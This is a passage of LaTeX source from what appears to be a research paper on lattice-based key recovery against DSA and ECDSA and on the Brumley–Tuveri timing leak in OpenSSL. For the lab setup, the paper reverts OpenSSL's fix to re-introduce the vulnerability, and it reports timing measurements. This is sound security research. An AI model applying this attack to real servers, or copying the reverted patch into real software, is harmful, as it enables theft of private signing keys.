528 | \draw [fill,purple,opacity=.4] (14,5) circle [radius=0.1]; 529 | \draw 
[fill,purple,opacity=.4] (15,6) circle [radius=0.1]; 530 | \draw [fill,purple,opacity=.4] (16,7) circle [radius=0.1]; 531 | \draw [fill,purple,opacity=.4] (17,8) circle [radius=0.1]; 532 | \draw [fill,purple,opacity=.4] (18,9) circle [radius=0.1]; 533 | 534 | \draw [fill,purple,opacity=.4] (14,7) circle [radius=0.1]; 535 | \draw [fill,purple,opacity=.4] (15,8) circle [radius=0.1]; 536 | \draw [fill,purple,opacity=.4] (16,9) circle [radius=0.1]; 537 | 538 | \draw [fill,purple,opacity=.4] (14,9) circle [radius=0.1]; 539 | 540 | % vectors 541 | \draw [thick,purple] [->] (5,5) -- (7, 9); 542 | \draw [thick,purple] [->] (5,5) -- (6, 8); 543 | 544 | \draw [thick,purple] [->] (18,5) -- (19, 4); 545 | \draw [thick,purple] [->] (18,5) -- (19, 6); 546 | \end{tikzpicture}\\ 547 | 548 | We will not dig into the internals of LLL here; see Chris Peikert's course\cite{chrispeikert} for a detailed explanation of the algorithm. 549 | 550 | \subsection{Babai} 551 | 552 | In 1986, Babai introduced two algorithms\cite{babai} to compute an approximate solution to the Closest Vector Problem.\\ 553 | Let $L$ be a lattice in $\mathbb{R}^d$, given by a basis $B = \{b_1, \hdots, b_d\}$, and let $x \in \mathbb{R}^d$. Let $u$ be the nearest neighbor of $x$ in $L$. Babai's procedures give a way to compute an approximation $w$ of this vector $u$. 554 | 555 | \textbf{Rounding Off procedure:} Let $\displaystyle x = \sum^d_{i=1} \beta_i b_i$ and let $\alpha_i$ be the integer nearest to $\beta_i$. Set $\displaystyle w = \sum^d_{i=1} \alpha_i b_i$.\\ 556 | 557 | \textbf{Nearest Plane procedure:} Let $\displaystyle U = \sum^{d-1}_{i=1} \mathbb{R} b_i$ be the linear subspace generated by $b_1, \hdots, b_{d-1}$ and let $\displaystyle L' = \sum^{d-1}_{i=1} \mathbb{Z} b_i$ be the corresponding sublattice of $L$.\\ 558 | Find $v \in L$ such that the distance between $x$ and the affine subspace $U + v$ is minimal. Let $x'$ denote the orthogonal projection of $x$ on $U + v$. Recursively, find $y \in L'$ near $x' - v$. 
Let $w = y + v$.\\ 559 | In order to find $v$ and $x'$, we proceed as follows: 560 | \begin{itemize} 561 | \item Write $x$ as a linear combination of the orthogonal basis: $\displaystyle x = \sum^{d}_{i=1} \gamma_i b_i^{\ast}$. 562 | \item Let $\delta$ be the integer nearest to $\gamma_d$. 563 | \item Then $\displaystyle x' = \sum^{d-1}_{i=1} \gamma b_i^{\ast} + \delta b_d^{\ast}$ and $v = \delta b_d$. 564 | \end{itemize} 565 | 566 | The \textbf{Rounding Off procedure} is simple enough to be explained here: 567 | 568 | \begin{figure}[H] 569 | \centering 570 | \begin{tikzpicture}[scale=1] 571 | 572 | 573 | \begin{scope}[scale=.28,local bounding box=scope1] 574 | \coordinate (Origin) at (0,0); 575 | \coordinate (XAxisMin) at (-1,0); 576 | \coordinate (XAxisMax) at (10,0); 577 | \coordinate (YAxisMin) at (0,-1); 578 | \coordinate (YAxisMax) at (0,10); 579 | \draw [thin, black!40, <->] (XAxisMin) -- (XAxisMax);% Draw x axis 580 | \draw [thin, black!40,<->] (YAxisMin) -- (YAxisMax);% Draw y axis 581 | %\draw[style=help lines,dashed,black!20] (-5,-5) grid[step=1cm] (5,5); 582 | 583 | % basis vectors 584 | \draw [->] (Origin) -- (4,1); 585 | \draw [->] (Origin) -- (1,3); 586 | 587 | % explanation 588 | \node[right] at (-7, 9) {\small{non-lattice vector}}; 589 | \draw[->, black!50] (-3, 8) -- (6,6.25); 590 | 591 | \node[right] at (-7, 4) {\small{basis vectors}}; 592 | \draw[->, black!50] (-5, 3) -- (-1, 2); 593 | 594 | % our little node 595 | \node[shape=circle,fill=purple,scale=0.4] at (6.7,6.25){}; 596 | \node[shape=circle,draw=purple,fill=none,scale=0.8] at (6.7,6.25){}; 597 | 598 | 599 | \end{scope} 600 | 601 | \begin{scope}[scale=.28,shift={(13,0)}] 602 | \coordinate (Origin) at (0,0); 603 | \coordinate (XAxisMin) at (-1,0); 604 | \coordinate (XAxisMax) at (10,0); 605 | \coordinate (YAxisMin) at (0,-1); 606 | \coordinate (YAxisMax) at (0,10); 607 | \draw [thin, black!40, <->] (XAxisMin) -- (XAxisMax);% Draw x axis 608 | \draw [thin, black!40,<->] (YAxisMin) -- 
(YAxisMax);% Draw y axis 609 | %\draw[style=help lines,dashed,black!20] (-5,-5) grid[step=1cm] (5,5); 610 | 611 | % basis vectors 612 | \draw [->] (Origin) -- (4,1); 613 | \draw [->] (Origin) -- (1,3); 614 | 615 | % extended basis vectors 616 | \draw [black!40] (4,1) -- (5,1.25); 617 | \draw [black!40] (1,3) -- (1.6,5); 618 | 619 | \draw [black!40] (5.1,1.25) -- (6.7,6.25); 620 | \draw [black!40] (1.6,5) -- (6.7,6.25); 621 | 622 | %\draw [black!40] (4,1) -- (5,4); 623 | %\draw [black!40] (1,3) -- (5,4); 624 | 625 | % our little node 626 | \node[shape=circle,fill=purple,scale=0.4] at (6.7,6.25){}; 627 | 628 | \end{scope} 629 | 630 | 631 | \begin{scope}[scale=.28,shift={(26,0)}] 632 | \coordinate (Origin) at (0,0); 633 | \coordinate (XAxisMin) at (-1,0); 634 | \coordinate (XAxisMax) at (10,0); 635 | \coordinate (YAxisMin) at (0,-1); 636 | \coordinate (YAxisMax) at (0,10); 637 | \draw [thin, black!40, <->] (XAxisMin) -- (XAxisMax);% Draw x axis 638 | \draw [thin, black!40,<->] (YAxisMin) -- (YAxisMax);% Draw y axis 639 | %\draw[style=help lines,dashed,black!20] (-5,-5) grid[step=1cm] (5,5); 640 | 641 | % basis vectors 642 | \draw (Origin) -- (4,1); 643 | \draw (Origin) -- (1,3); 644 | 645 | % extended basis vectors 646 | \draw [black!40] (4,1) -- (5,4); 647 | \draw [black!40] (1,3) -- (5,4); 648 | 649 | % our little node 650 | \node[shape=circle,fill=purple!60,scale=0.4] at (6.7,6.25){}; 651 | 652 | % our new little node :) 653 | \node[shape=circle,fill=purple,scale=0.4] at (5,4){}; 654 | \node[shape=circle,fill=none,draw=purple,scale=0.8] at (5,4){}; 655 | 656 | \end{scope} 657 | 658 | \end{tikzpicture} 659 | \caption{The non-lattice vector can be written with the basis vectors of the lattice, then the procedure rounds off these coefficients to find the closest lattice vector} 660 | \end{figure} 661 | 662 | \section{Lattice Attacks on DSA} 663 | 664 | Lattices and the tools they come with have been used everywhere in crypto: building security proofs, building 
cryptosystems (and sometimes post-quantum cryptosystems), breaking cryptosystems. 664 | 665 | 666 | In 1982, the first efficient lattice basis reduction algorithm, LLL, was invented by the Lenstra brothers and Lovász\cite{lll}. More than 10 years later, in 1995, Coppersmith published his theorem along with a construction using LLL that could be used to attack RSA\cite{coppersmith}. 667 | 668 | A year later, in 1996, D. Boneh and R. Venkatesan\cite{boneh-venkatesan} formulated the \textbf{Hidden Number Problem} and used that same algorithm to prove a result on the hardness of computing the most significant bits of Diffie-Hellman secrets (and of other related schemes), which is regarded by many cryptographers as one of the most positive applications of lattices. 669 | 670 | The same kind of idea was independently found by \textbf{Howgrave-Graham} and \textbf{Smart} three years later\cite{HG-smart}, but this time used to attack DSA. Oddly, they made use of Babai's algorithm while a more efficient technique, called the Embedding Strategy, was used in the paper by Boneh and Venkatesan. 671 | 672 | Following is an explanation of a special case of Howgrave-Graham and Smart's attack on DSA, which we will later use to attack ECDSA. We will then explain how to improve on it by using the Embedding Technique. 673 | 674 | \subsection{Reducing a Relaxed DSA Problem to a Closest Vector Problem} 675 | 676 | So now imagine that \textbf{we have a number $n$ of signatures} $(r_i, s_i)$ from DSA, all produced with the same private key, that \textbf{all have particularly ``small'' nonces} $k_i$.\\ 677 | Recall these are the equations we now have, for $0 \leq i < n$: 678 | \begin{align*} 679 | &r_i = (g^{k_i} \pmod{p}) \pmod{q}\\ 680 | &s_i = k_i^{-1} ( H(m_i) + x \cdot r_i ) \pmod{q} 681 | \end{align*} 682 | 683 | where $g$, $p$, $q$ are public and $H(m_i)$ can be computed as well, since the signed messages are known to the attacker. Here, the $k_i$ are the secret nonces and $x$ is the private key. 
684 | 685 | We notice that, since $H(m_i)$ is known, \textbf{the second equation} can be rewritten as: 686 | 687 | $$ H(m_i) = s_i k_i - x \cdot r_i \pmod{q} $$ 688 | 689 | As this is an attack on the nonces we want to \textbf{get rid of the private key}. To do that we use one of the equations, say the first one, to eliminate $x$ from all the others: 690 | 691 | \begin{align*} 692 | &H(m_0) = s_0 \cdot k_0 - x \cdot r_0 \pmod{q}\\ 693 | \forall i, \text{ } &H(m_0) \cdot r_0^{-1} \cdot r_i = s_0 \cdot k_0 \cdot r_0^{-1} \cdot r_i - x \cdot r_i \pmod{q} 694 | \end{align*} 695 | 696 | Since we know all the $r_i$ we can compute the coefficients of the second equation (this requires $r_0$ and the $s_i$ to be invertible modulo $q$, which DSA guarantees since a signature with $r = 0$ or $s = 0$ is rejected), and we can then subtract it from each of the other equations to remove the private key $x$: 697 | 698 | \begin{align*} 699 | \forall i \neq 0 \text{, } H(m_i) - H(m_0) \cdot r_0^{-1} \cdot r_i &= s_i \cdot k_i - s_0 \cdot k_0 \cdot r_0^{-1} \cdot r_i \pmod{q}\\ 700 | (H(m_i) - H(m_0) \cdot r_0^{-1} \cdot r_i) \cdot s_i^{-1} &= k_i - k_0 \cdot s_0 \cdot r_0^{-1} \cdot r_i \cdot s_i^{-1} \pmod{q} 701 | \end{align*} 702 | 703 | We now have $n - 1$ equations whose \textbf{only unknowns are the nonces}: the $k_i$ and the nonce $k_0$ of the first equation, which appears in every one of them. All of them should be around the same size, which is relatively \textbf{small}. Writing $A_i = - s_0 \cdot r_0^{-1} \cdot r_i \cdot s_i^{-1}$ and $B_i = -(H(m_i) - H(m_0) \cdot r_0^{-1} \cdot r_i) \cdot s_i^{-1}$, both computable from public data only, the equations become: 704 | 705 | $$ k_i + A_i k_0 + B_i = 0 \pmod{q} $$ 706 | 707 | We have now successfully \textbf{avoided attacking the discrete logarithm} part of the system and reduced it to finding small solutions to a set of modular equations. This is where lattices are useful. We now have to shape our equations so as to reduce our problem to a CVP or an SVP and use any of the algorithms previously discussed. 
708 | 709 | We now have a system with $k_i < q \text{ } \forall i \in \mathbb{Z}_n$, for some integers $z_i$: 710 | $$ \begin{cases} 711 | k_0\\ 712 | k_1 = - A_1 k_0 + z_1 q - B_1 \\ 713 | \hdots\\ 714 | k_{n-1} = - A_{n-1} k_0 + z_{n-1} q - B_{n-1}\\ 715 | \end{cases} 716 | $$ 717 | 718 | And if the $k_i$ are small we know that the distance between $-A_i k_0 + z_i q$ and $B_i$ is small. How can we transform that into a lattice problem? More accurately, into a Closest Vector Problem? First let's \textbf{transform the above system into a matrix system}: 719 | 720 | $$ 721 | \begin{pmatrix} k_0\\k_1\\ \vdots\\k_{n-1} \end{pmatrix} 722 | = 723 | \begin{pmatrix} 724 | -1\\ 725 | A_1 & q \\ 726 | \vdots & & \ddots \\ 727 | A_{n-1} & & & q 728 | \end{pmatrix} 729 | \begin{pmatrix} -k_0\\z_1\\ \vdots\\z_{n-1} \end{pmatrix} 730 | - 731 | \begin{pmatrix} 0\\B_1\\ \vdots\\B_{n-1} \end{pmatrix} 732 | $$ 733 | 734 | It is now clear that we can use the $n \times n$ matrix as the basis of a lattice in which we are looking for a vector (the integer linear combination of the basis vectors with coefficient vector $(-k_0, z_1, \hdots, z_{n-1})$) that should be very close to the vector $(0, B_1 , \hdots, B_{n-1})$, since their difference is the small vector $(k_0, \hdots, k_{n-1})$. 735 | 736 | In other words, we need to find a vector of the lattice spanned by the columns of the above $n \times n$ matrix that is close to our non-lattice vector $(0, B_1 , \hdots, B_{n-1})$. This gives us the coefficient vector $(-k_0, z_1, \hdots, z_{n-1})$, from which the nonce vector $(k_0, \hdots, k_{n-1})$ follows, and then the private key from any single signature. \textbf{This is an instance of the Closest Vector Problem}, and we can use one of Babai's procedures to try to solve it. Since these algorithms only promise approximations, these ways of finding the nonces are heuristics and not proven: the vector returned may not be the one we want, so any recovered key must be checked against the public key. Different lattices will give different outcomes, but as is well known, LLL often performs much better in practice than its proven bounds suggest. 
737 | 738 | \subsection{The Embedding Strategy} 739 | 740 | While Howgrave-Graham and Smart talk about using Babai's procedures to solve the CVP, our tests show that they are not efficient enough. The well-known ``Embedding Strategy'' allows one to heuristically reduce the CVP to an SVP and thus to directly use a lattice basis reduction algorithm (such as LLL) to solve the problem. 741 | 742 | This is how it works: we add our non-lattice vector $u$ to the basis, so that it now belongs to the lattice. Remember, we are looking for a lattice vector $v$ very close to $u$; since both vectors now lie in the enlarged lattice, so does their difference $u - v$ (or $v - u$), which should be really short, and we hope that the reduction algorithm will find it. The heuristic also says to add one dimension to the lattice and to give a non-zero coefficient in that new dimension only to the new basis vector $u$. This way we can test whether a short vector of the reduced basis has actually used our vector $u$ exactly once by checking that its extra coordinate equals that coefficient (up to sign). 743 | 744 | Our previous problem is now reduced to finding a short vector in the lattice spanned by the columns of the following matrix (with $B_0 = 0$): 745 | 746 | $$ 747 | \begin{pmatrix} 748 | -1 & & & & B_0\\ 749 | A_1 & q & & & B_1 \\ 750 | \vdots & & \ddots & &\vdots \\ 751 | A_{n-1} & & & q & B_{n-1}\\ 752 | 0 & 0 & \hdots & 0 & 1 753 | \end{pmatrix} 754 | $$ 755 | 756 | Here the new dimension's coefficient, which we will call the trick, is $1$. To balance its value with the other coordinates of the wanted solution, which are nonces of about $\log_2 q - l$ bits, we will use $q / 2^{l+1}$ instead of $1$, where $l$ is the number of most significant bits known to be zero in the nonces. Since the whole procedure is heuristic, the short vector returned is only a candidate: one checks that its last coordinate is the trick, derives the private key from the recovered $k_0$ and the first signature, and validates it by recomputing the public key; if the check fails, the attack is retried with another set of signatures. 757 | 758 | 759 | \section{A Timing Attack in OpenSSL} 760 | 761 | \subsection{Side-Channel Attacks} 762 | 763 | We have seen that using a non-cryptographically secure Pseudo Random Number Generator (PRNG) or making mistakes when implementing the generation of the nonce breaks DSA and ECDSA. 
But more subtle than that, we now know that the slightest information on the nonces of a few signatures will allow us to break an otherwise secure system. 764 | 765 | Side-channel attacks are a class of attacks that exploit information leaked through channels other than the intended inputs and outputs of an algorithm: for example by measuring the electromagnetic radiation, the power consumed, the vibrations, the acoustic emissions or even the time taken by an algorithm to perform an operation. These measurements often provide critical information about the private elements of cryptosystems. 766 | 767 | In this paper we will focus on timing attacks, which are one of the only side-channel attacks that can be mounted against a remote target. They were first introduced by Kocher in 1996\cite{Kocher}, who showed how to break implementations of Diffie-Hellman, RSA and DSA using the time the algorithms took to perform the operations involving the secret elements of their system. 768 | 769 | \subsection{The Timing Attack} 770 | 771 | \textbf{B.B.Brumley} and \textbf{N.Tuveri} found out\cite{brumley-tuveri} that a part of OpenSSL's ECDSA code contained a timing leak: 772 | 773 | In ECDSA, one of the state-of-the-art countermeasures against timing attacks is to use a \textbf{constant-time} algorithm for the scalar multiplication. For binary curves, OpenSSL uses the \textbf{Montgomery Ladder} to compute the point multiplication $[k] P$ from which $r$ is derived. Unfortunately, an optimization was present right before the ladder: it skips the leading zero bits of the scalar $k$, so that the number of ladder iterations depends on the bit length of $k$. 
774 | 775 | \begin{figure}[H] 776 | \begin{minted}[breaklines,frame=single]{C} 777 | /* find top most bit and go one past it */ 778 | i = bn_get_top(scalar) - 1; 779 | mask = BN_TBIT; 780 | word = bn_get_words(scalar)[i]; 781 | while (!(word & mask)) 782 | mask >>= 1; 783 | mask >>= 1; 784 | /* if top most bit was at word break, go to next word */ 785 | if (!mask) { 786 | i--; 787 | mask = BN_TBIT; 788 | } 789 | 790 | for (; i >= 0; i--) { 791 | word = bn_get_words(scalar)[i]; 792 | while (mask) { 793 | BN_consttime_swap(word & mask, x1, x2, bn_get_top(group->field)); 794 | BN_consttime_swap(word & mask, z1, z2, bn_get_top(group->field)); 795 | if (!gf2m_Madd(group, point->X, x2, z2, x1, z1, ctx)) 796 | goto err; 797 | if (!gf2m_Mdouble(group, x1, z1, ctx)) 798 | goto err; 799 | BN_consttime_swap(word & mask, x1, x2, bn_get_top(group->field)); 800 | BN_consttime_swap(word & mask, z1, z2, bn_get_top(group->field)); 801 | mask >>= 1; 802 | } 803 | mask = BN_TBIT; 804 | } 805 | \end{minted} 806 | \caption{The optimization that leads to a timing vulnerability in \textit{crypto/ec/ec2\_mult.c} in versions of OpenSSL predating the Brumley--Tuveri fix: the ladder loop only starts below the most significant set bit of the scalar} 807 | \end{figure} 808 | 809 | This made the computation of the signature faster when the binary length of the nonce $k$ was shorter, and slower when it was longer: the loop above starts just below the most significant set bit of $k$, so the number of ladder iterations (and hence the signing time) grows with the bit length of $k$. The time OpenSSL took to compute an ECDSA signature was thus leaking the bit length of the nonces, and we have seen in the previous section that knowing a few nonces to be short is enough to recover the private key! 810 | 811 | \subsection{A TLS Handshake with an Ephemeral Cipher-Suite} 812 | 813 | \begin{figure}[H] 814 | \includegraphics[width=\textwidth]{rfc5246.png} 815 | \caption{The handshake illustrated in \href{https://tools.ietf.org/html/rfc5246#section-7.3}{RFC 5246} along with the extra-messages due to the ephemeral cipher-suite chosen} 816 | \end{figure} 817 | 818 | To attack the server's ECDSA private key, we need it to sign a multitude of messages with that key. The easiest way to do this is to ask for an ephemeral key exchange, in which the server signs fresh key-exchange parameters on every handshake. 
In Figure 5, you can see that when asking for an ephemeral cipher-suite in the ClientHello (DHE/ECDHE) you then get one extra message in the server's response: the \textbf{ServerKeyExchange} packet. 819 | 820 | \begin{figure}[H] 821 | \includegraphics[width=\textwidth]{serverKeyExchange.png} 822 | \caption{The serverKeyExchange packet parsed by WireShark} 823 | \end{figure} 824 | 825 | As you can see the server answers with a DSA/ECDSA signature, which is computed over the hash of ClientHello.random concatenated with ServerHello.random concatenated with the ServerKeyExchange.params (a hash that ECDSA truncates to the bit length of the group order); all of these values are sent in the clear during the handshake, so the attacker can compute $H(m_i)$ for every signature collected. By the way, the fact that only the parameters, and not the key-exchange algorithm negotiated, are covered by this signature is the cause of a long and old series of attacks, whose most recent episode is the \textbf{Logjam attack}\cite{logjam}. 826 | 827 | \begin{figure}[H] 828 | \includegraphics[width=\textwidth]{ecdsa_rfc4492.png} 829 | \caption{The excerpt of \href{https://tools.ietf.org/html/rfc4492#section-5.4}{RFC 4492} talking about the signature part of an ephemeral handshake} 830 | \end{figure} 831 | 832 | The attack will consist of sending many ClientHello messages and collecting the signatures while timing the response, until enough signatures likely to have been produced with short nonces have been captured. 833 | 834 | \subsection{Measuring a Timing Attack} 835 | 836 | Since we are doing a remote attack, we cannot time the exact computation of the signature; what we measure instead is the \textbf{round trip} time, decomposed by Crosby et al.\cite{crosby} as follows: 837 | $$ \text{response\_time } = \text{ processing\_time } + \text{ propagation\_time } + \text{ jitter} $$ 838 | 839 | Here the \textit{processing\_time} is the time between the target reading our ClientHello and the target emitting its response. The nonce multiplication we want to time is part of it and should be the only relevant computation in the overall timing of that part (i.e. 
all other server procedures' times are negligible compared to that multiplication). The \textit{propagation\_time} is the average time spent by the data in transit (i.e. between the attacker and the target). Finally, the \textit{jitter} is the uncontrollable noise/latency that can occur for many diverse reasons. The jitter is often the core problem of a remote timing attack.\\ 840 | 841 | To time events with high resolution, we rely on the \textbf{rdtscp} instruction, which reads the CPU's Time Stamp Counter (on current processors this counter increments at a constant rate regardless of the core's actual frequency, so it measures elapsed time rather than retired cycles). Contrary to rdtsc, rdtscp waits for all preceding instructions to complete before reading the counter, so it does not need a preceding cpuid as a serializing barrier; note that it does not prevent later instructions from being executed before it, which is why Intel's measurement guidelines pair it with a following cpuid when the end of the timed region matters. You only ``need'' cpuid + rdtsc if your processor does not support the more recent rdtscp: rdtsc has been available since the Pentium, whereas rdtscp only exists on more recent processors. 842 | 843 | \subsection{The Setup} 844 | 845 | We modified \href{ftp://ftp.openssl.org/source/old/1.0.1/openssl-1.0.1j.tar.gz}{openssl-1.0.1j} to re-introduce the vulnerability by reverting the \href{https://git.openssl.org/?p=openssl.git;a=blobdiff;f=CHANGES;h=1633d27975c91f122c4e9266b2c3cf4e56e8ffbf;hp=22749650b701d91cc43af24a226369116c2a46f8;hb=992bdde62d2eea57bb85935a0c1a0ef0ca59b3da;hpb=bbcf3a9b300bc8109bb306a53f6f3445ba02e8e9}{patch from B.B.Brumley and N.Tuveri in OpenSSL 1.0.1j}, which adds the group order to $k$ once or twice so that the scalar fed to the ladder always has a fixed bit length, as can be seen in figure \ref{fig:commented_patch}. 846 | 847 | \begin{figure}[H] 848 | \begin{minted}[breaklines,frame=single]{C} 849 | /* 850 | * We do not want timing information to leak the length of k, so we 851 | * compute G*k using an equivalent scalar of fixed bit-length. 
852 | */ 853 | 854 | /* 855 | if (!BN_add(k, k, order)) 856 | goto err; 857 | if (BN_num_bits(k) <= BN_num_bits(order)) 858 | if (!BN_add(k, k, order)) 859 | goto err; 860 | */ 861 | \end{minted} 862 | \caption{The patch commented out in \textit{crypto/ecdsa/ecs\_ossl.c}, which re-introduces the dependency of the scalar's bit length on the nonce} 863 | \label{fig:commented_patch} 864 | \end{figure} 865 | Instead of crafting a client that only offers our ephemeral ECDSA cipher suite, we can use a server that only accepts that kind of cipher suite. This is done with the OpenSSL command line tool and the following arguments: 866 | 867 | \begin{minted}[breaklines, 868 | ]{bash} 869 | $ openssl s_server -cert server.pem -key server.key -cipher "ECDHE-ECDSA-AES128-SHA256" -serverpref -quiet 870 | \end{minted} 871 | 872 | The \textit{-serverpref} argument makes the server's cipher-suite preference order prevail over the client's; combined with the single-entry \textit{-cipher} list, it forces every handshake to use ECDHE-ECDSA. Here we also use a server private key and certificate that we generated with the following commands. Note that we chose the binary curve \textbf{sect163r2}, but any binary curve should be affected, since they all go through the same vulnerable code path: 873 | 874 | \begin{minted}[breaklines]{bash} 875 | $ openssl ecparam -out server.key -name sect163r2 -genkey 876 | $ openssl req -new -key server.key -x509 -nodes -days 365 -out server.pem 877 | \end{minted} 878 | 879 | And we obtain the certificate of figure 880 | \ref{fig:cert}. 
881 | 882 | \begin{figure}[H] 883 | \begin{minted}[breaklines,frame=single]{bash} 884 | $ openssl x509 -in server.pem -noout -text 885 | Certificate: 886 | Data: 887 | Version: 3 (0x2) 888 | Serial Number: 10869927066769118182 (0x96d9bd136d2d53e6) 889 | Signature Algorithm: ecdsa-with-SHA256 890 | Issuer: C=US, ST=example@example.com, L=example@example.com, O=example@example.com, OU=example@example.com, CN=example@example.com/ emailAddress=example@example.com 891 | Validity 892 | Not Before: May 5 21:01:16 2015 GMT 893 | Not After : May 4 21:01:16 2016 GMT 894 | Subject: C=US, ST=example@example.com, L=example@example.com, O=example@example.com, OU=example@example.com, CN=example@example.com/ emailAddress=example@example.com 895 | Subject Public Key Info: 896 | Public Key Algorithm: id-ecPublicKey 897 | Public-Key: (163 bit) 898 | pub: 899 | 04:04:f3:e6:dd:ff:c4:ba:45:28:2f:3f:ab:e0:e8: a2:20:b9:89:80:38:7a:05:d6:78:6b:3f:bd:8e:a7: 9c:b7:99:1c:d7:79:85:15:bb:cc:47:ce:54 900 | ASN1 OID: sect163r2 901 | NIST CURVE: B-163 902 | X509v3 extensions: 903 | X509v3 Subject Key Identifier: 904 | 35:B6:17:DC:06:42:19:C5:23:13: 905 | 0E:35:26:AF:81:0C:E2:C4:91:B6 906 | X509v3 Authority Key Identifier: 907 | keyid:35:B6:17:DC:06:42:19:C5: 908 | 23:13:0E:35:26:AF:81:0C:E2:C4:91:B6 909 | 910 | X509v3 Basic Constraints: 911 | CA:TRUE 912 | Signature Algorithm: ecdsa-with-SHA256 913 | 30:2e:02:15:03:f6:6a:a4:d4:e2:e5:80:30:bc:65:5a:da:32: 914 | 5e:ab:b7:8b:fd:f6:88:02:15:01:fa:fa:23:59:f7:c1:23:d5: 915 | 75:7c:a6:49:0b:d3:56:85:95:34:82:02 916 | \end{minted} 917 | \caption{The x509 certificate containing the binary curve as ECDHE/ECDSA parameters we generated with OpenSSL} 918 | \label{fig:cert} 919 | \end{figure} 920 | 921 | \subsection{From the Server (the Target)} 922 | 923 | We first modified OpenSSL to store the nonces it signed and how long it took to sign them. We then queried that server many times to make it use the ECDSA nonce multiplication operation. 
It took us 6 to 7 seconds to fetch 1,000 signatures and around a minute to fetch 10,000 signatures from the server. 924 | 925 | \begin{figure}[H] 926 | \includegraphics[width=\textwidth]{serverside_scrambled.png} 927 | \caption{Every point is a signature, plotted according to the time it took the server to compute it in clock cycles (x axis)} 928 | \end{figure} 929 | 930 | After obtaining all the nonces and the timings, we plotted them and displayed the result in figure \ref{fig:serverside} to see that there was indeed a timing vulnerability in the ECDSA signature of OpenSSL for binary curves. 931 | 932 | \begin{figure}[H] 933 | \includegraphics[width=\textwidth]{serverside.png} 934 | \caption{The same graph where the signatures have been sorted by the binary length of the nonce (y axis) along the time it took the server to compute them in clock cycles (x axis)} 935 | \label{fig:serverside} 936 | \end{figure} 937 | 938 | The frequency plot in figure \ref{fig:frequency_server} might be a better indication that the obvious strategy here is to cherry-pick the fastest responses and hope that they reach a pre-defined number of most significant bits set to zero. 
939 | 940 | \begin{figure}[H] 941 | \includegraphics[width=\textwidth]{frequency_server.png} 942 | \caption{The blue line represents the signatures generated with nonces of bitsize longer than 157 bits, the red line represents signatures correlated with nonces of bitsize inferior or equal to 157 bits.} 943 | \label{fig:frequency_server} 944 | \end{figure} 945 | 946 | Finally we did some statistics on the amount of short nonces, the statistics were approximately the same for 1,000 and for 10,000 signatures: 947 | 948 | \begin{figure}[H] 949 | \begin{center} 950 | \begin{tabular}{@{} *2c @{}} 951 | \toprule 952 | Length & Percentage \\ 953 | \midrule 954 | $<157$& 0 \\ 955 | 157& 1 \\ 956 | 158& 3 \\ 957 | 159& 6 \\ 958 | 160& 13 \\ 959 | 161& 24 \\ 960 | 162& 50 961 | \bottomrule 962 | \end{tabular} 963 | \end{center} 964 | \caption{Statistics on nonces generated for 1,000 signatures} 965 | \end{figure} 966 | These percentages are rounded and that shows that short nonces are pretty rare, here's a better table showing the amount of short nonces for 10,000 signatures requested: 967 | 968 | \begin{figure}[H] 969 | \begin{center} 970 | \begin{tabular}{@{} *2c @{}} 971 | \toprule 972 | length & amount \\ 973 | \midrule 974 | 146 & 1 \\ 975 | 150& 1 \\ 976 | 151 & 4 \\ 977 | 152 & 8 \\ 978 | 153 & 12 \\ 979 | 154 & 12 \\ 980 | 155 & 41 \\ 981 | 156& 90 \\ 982 | 157 & 141 \\ 983 | 158 & 319 \\ 984 | 159 & 624 \\ 985 | 160 & 1259 \\ 986 | 161 & 2503 \\ 987 | 162 &4985 988 | \bottomrule 989 | \end{tabular} 990 | \end{center} 991 | \caption{Statistics on nonces generated for 10,000 signatures} 992 | \end{figure} 993 | 994 | We will discuss in the following sections how many nonces we need to perform the lattice attack. 995 | 996 | 997 | \subsection{From a Remote Machine} 998 | 999 | We tried getting the same kind of results from a different server located in the same local network. The tests were performed on a Intel Pentium CPU 1403 @ 2.60GHz. 
To simplify testing and avoid parsing the responses, we modified the OpenSSL server to store the truncated hashes and the signatures server side. 1000 | 1001 | The source code of the client is in Appendix A; it always sends the same \textit{ClientHello} packet (and the same \textit{client.Random}). The client counts the CPU cycles of the response time. If the attack is performed from multiple machines with different CPU frequencies then we would have to convert the CPU cycles into a time unit before gathering the data together. 1002 | 1003 | Several ways of increasing the accuracy of these measurements were researched. The easiest thing is to configure the client machine that is in our control. Decreasing the jitter is often impossible since it happens out of our reach; getting close to the server seems to be the best way to do it, although our results are still inconclusive in a local network test environment as you will see later. 1004 | 1005 | The program is run with the \textit{taskset} tool to avoid using multiple CPUs, along with some kernel options like \textit{isolcpus} to avoid interruptions on the CPU we are using to make the measurements. The frequency scaling on that same CPU is disabled to avoid inconsistently counting CPU cycles. The program sends all but one byte, then sends the last byte and starts the \textit{rdtscp} counter. The counter is stopped as soon as the first byte is received. To do this we also need to disable \textit{Nagle's algorithm} on the socket we are using to disable network optimizations. 1006 | 1007 | After collecting all the signatures we get rid of the first 10 samples and their imprecision due to the server cache warming up. 1008 | 1009 | \begin{figure}[H] 1010 | \includegraphics[width=\textwidth]{fail.png} 1011 | \caption{the y axis represents the bitsize of the nonces, the x axis the time the OpenSSL server took to respond.
They are obviously not correlated} 1012 | \end{figure} 1013 | 1014 | Retrieving 500 tuples (signatures and truncated digests) that took the smallest amount of time from 100,000 signatures, we can see that we do not have enough nonces of small sizes in our set (see next section on the lattice attack for numbers), plus the amount of false-positive is extremely high. We then try to get the smallest time upper-bound that would contain enough small nonces. We arrive at approximately 5,000: the fastest 5,000 signatures of our 100,000 signatures set should contain enough small nonces to do our lattice attack. And as we can see in figure 15 and in the following statistics, the amount of false positive is still extremely high. 1015 | 1016 | \begin{table}[H] 1017 | \parbox{.45\linewidth}{ 1018 | \centering 1019 | \begin{tabular}{@{} *3c @{}} 1020 | \toprule 1021 | length&amount&percentage\\ 1022 | \midrule 1023 | 150 & 1 & 0\\ 1024 | 152 & 1 & 0\\ 1025 | 153 & 1 & 0\\ 1026 | 154 & 3 & 0\\ 1027 | 155 & 10 & 2\\ 1028 | 156 & 11 & 2\\ 1029 | 157 & 18 & 3\\ 1030 | 158 & 27 & 5\\ 1031 | 159 & 42 & 8\\ 1032 | 160 & 89 & 17\\ 1033 | 161 & 113 & 22\\ 1034 | 162 & 184 & 36\\ 1035 | \bottomrule 1036 | \end{tabular} 1037 | \caption{Stats on the nonces that computed the fastest 500 signatures from 100,000 handshakes} 1038 | } 1039 | \hfill 1040 | \parbox{.45\linewidth}{ 1041 | \centering 1042 | \begin{tabular}{@{} *3c @{}} 1043 | \toprule 1044 | length&amount&percentage\\ 1045 | \midrule 1046 | 150 & 1 & 0\\ 1047 | 151 & 1 & 